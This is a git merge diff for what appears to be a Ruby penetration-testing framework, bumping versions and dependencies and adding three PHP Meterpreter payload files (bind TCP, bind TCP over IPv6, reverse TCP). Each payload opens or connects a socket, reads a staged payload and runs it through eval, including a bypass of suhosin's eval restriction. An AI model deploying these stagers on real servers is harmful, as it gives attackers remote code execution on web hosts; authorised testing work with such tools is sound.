Merge branch 'development'

Author: rastating

.gitignore

@@ -91,7 +91,6 @@ sftp-config.json
 
 # Atom Plugins
 deployment-config.json
-Gemfile.lock
 
 # NPM
 node_modules/

.ruby-version

@@ -1 +1 @@
-2.4.2
+2.4.3

.travis.yml

@@ -2,6 +2,7 @@ language: ruby
 rvm:
   - 2.3.5
   - 2.4.2
+  - 2.4.3
 before_install:
   - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
 script: bundle exec rspec

Gemfile

@@ -4,7 +4,7 @@ source 'https://rubygems.org'
 gem 'colorize', '>=0.8.1'
 gem 'mime-types', '>=3.1'
 gem 'nokogiri', '~>1.8.1'
-gem 'require_all', '~>1.4'
+gem 'require_all', '~>2.0'
 gem 'rubyzip', '~>1.2.1'
 gem 'slop', '~>4.6.0'
 gem 'typhoeus', '~>1.3.0'

Gemfile.lock

@@ -0,0 +1,48 @@
+GEM
+  remote: https://rubygems.org/
+  specs:
+    colorize (0.8.1)
+    diff-lcs (1.3)
+    ethon (0.11.0)
+      ffi (>= 1.3.0)
+    ffi (1.9.18)
+    mime-types (3.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2016.0521)
+    mini_portile2 (2.3.0)
+    nokogiri (1.8.1)
+      mini_portile2 (~> 2.3.0)
+    require_all (2.0.0)
+    rspec (3.7.0)
+      rspec-core (~> 3.7.0)
+      rspec-expectations (~> 3.7.0)
+      rspec-mocks (~> 3.7.0)
+    rspec-core (3.7.0)
+      rspec-support (~> 3.7.0)
+    rspec-expectations (3.7.0)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.7.0)
+    rspec-mocks (3.7.0)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.7.0)
+    rspec-support (3.7.0)
+    rubyzip (1.2.1)
+    slop (4.6.0)
+    typhoeus (1.3.0)
+      ethon (>= 0.9.0)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  colorize (>= 0.8.1)
+  mime-types (>= 3.1)
+  nokogiri (~> 1.8.1)
+  require_all (~> 2.0)
+  rspec (~> 3.7)
+  rubyzip (~> 1.2.1)
+  slop (~> 4.6.0)
+  typhoeus (~> 1.3.0)
+
+BUNDLED WITH
+   1.16.1

VERSION

@@ -1 +1 @@
-1.8.1
+1.9

data/php/meterpreter_bind_tcp.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/php/meterpreter_bind_tcp_ipv6.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (is_callable('stream_socket_server')) { $srvsock = stream_socket_server("tcp://{$ip}:{$port}"); if (!$srvsock) { die(); } $s = stream_socket_accept($srvsock, -1); fclose($srvsock); $s_type = 'stream'; } elseif (is_callable('socket_create_listen')) { $srvsock = socket_create_listen(AF_INET6, SOCK_STREAM, SOL_TCP); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } elseif (is_callable('socket_create')) { $srvsock = socket_create(AF_INET6, SOCK_STREAM, SOL_TCP); $res = socket_bind($srvsock, $ip, $port); if (!$res) { die(); } $s = socket_accept($srvsock); socket_close($srvsock); $s_type = 'socket'; } else { die(); } if (!$s) { die(); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

data/php/meterpreter_reverse_tcp.php

@@ -0,0 +1 @@
+/*<?php /**/ error_reporting(0); if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

lib/cli/context.rb

@@ -19,12 +19,7 @@ def load_module(path)
     end
 
     def reload
-      if @module_path =~ /^exploit\//i
-        load("#{@module_path.sub('exploit/', 'exploits/')}.rb")
-      else
-        load("#{@module_path}.rb")
-      end
-
+      load("#{@module_path}.rb")
       load_module(@module_path)
     end